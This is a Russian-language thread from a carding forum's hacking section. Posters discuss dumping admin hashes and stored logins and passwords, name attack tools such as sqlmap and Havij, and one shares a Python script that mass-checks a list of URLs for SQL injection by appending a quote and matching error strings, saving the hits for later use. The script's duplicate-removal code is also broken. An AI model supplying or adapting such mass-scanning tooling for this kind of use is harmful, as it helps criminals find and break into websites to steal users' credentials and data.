Go Back   Carder.life > [ru] Forum for Russians > Хакинг. Программирование
Reload this Page [Python] Простенький чекер на SQL INJ

CARDER.MARKET - CARDING FORUM FOR PROFESSIONAL CARDERS


Reply
 
Thread Tools Display Modes
  #1  
Old 05-15-2025, 09:44 PM
Highstnr's Avatar

Highstnr Highstnr is offline
Join Date: Dec 2022
Posts: 0
Default

Quote:
Originally Posted by ToniWhite
админка в хэш виде, и куча логов и пассов... вроде все?
Quote:
Originally Posted by ToniWhite
админка в хэш виде, и куча логов и пассов... вроде все?
Quote:
Originally Posted by Caligula
Code:
nikto 2.1.6-1
A web server scanner which performs comprehensive tests against web servers for multiple items
sqlmap 1.0.7-1
Automatic SQL injection and database takeover tool
win - acunetix, havij
Добавлено через 2 минуты 39 секунд
Что означает админка в хэш виде? Как может быть код в хэш виде? Хэширование - не обратимое шифрование, и его применяют часто только к паролям.
Добавлено через 16 секунд
Что означает админка в хэш виде? Как может быть код в хэш виде? Хэширование - не обратимое шифрование, и его применяют часто только к паролям.
Добавлено через 3 минуты 52 секунды
import os

import sys

import urllib

def log_crt(name, text):

	if os.path.exists(name):

		open(name, 'a+').write(text)

		return True

	else:

		return False

def sites(name, id):

	if os.path.exists(name):

		text = open(name, 'r').readlines()

		return text[id]

	else:

		sys.exit(1)

print("[!] SQL Inj checker")	

if __name__ == "__main__":

	if sys.argv[1] != "" and sys.argv[2] != "":

		for i in range(0, len(open(sys.argv[1], 'r').readlines())):

			site = sites(sys.argv[1], i)

			try:

				html = urllib.urlopen(site + "'").read()

				if 'SQL' in html or 'syntax' in html or 'Warning' in html:

					log_crt(sys.argv[2], site)

					print("[\033[1;32mGOOD\033[1;m] " + site)

				else:

					print("[\033[1;31mERROR\033[1;m] " + site)

			except:

				pass

		print("[\033[1;32mDellete repeat domains\033[1;m]")

		for i in range(0, len(open(sys.argv[2], 'r').readlines())):

			domain = sites(sys.argv[2], i).replace('http://', '').split('/')

			for j in range(0, len(open(sys.argv[2], 'r').readlines())):

				dell_domain = sites(sys.argv[2], i).replace('http://', '').split('/')

				if(dell_domain[0] == domain[0]):

					f = open(sys.argv[2]).read()

					f.replace(sites(sys.argv[2], j), '')

		print("[\033[1;32mDone\033[1;m]")

else:

	print("Error!")

Написал за пару минут и сам его использую, запускать так: python script_name.py файл_с_сайтами.txt файл_для_сохранения_резуль� �атов.txt
ни хера сигнатурка
Code:
				if 'SQL' in html or 'syntax' in html or 'Warning' in html:

и слово
Dellete
казнить нельзя помиловать
Reply

Tags
NULL

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is On
Forum Jump




All times are GMT. The time now is 08:44 PM.

Contact Us - Carder.life - Archive - Top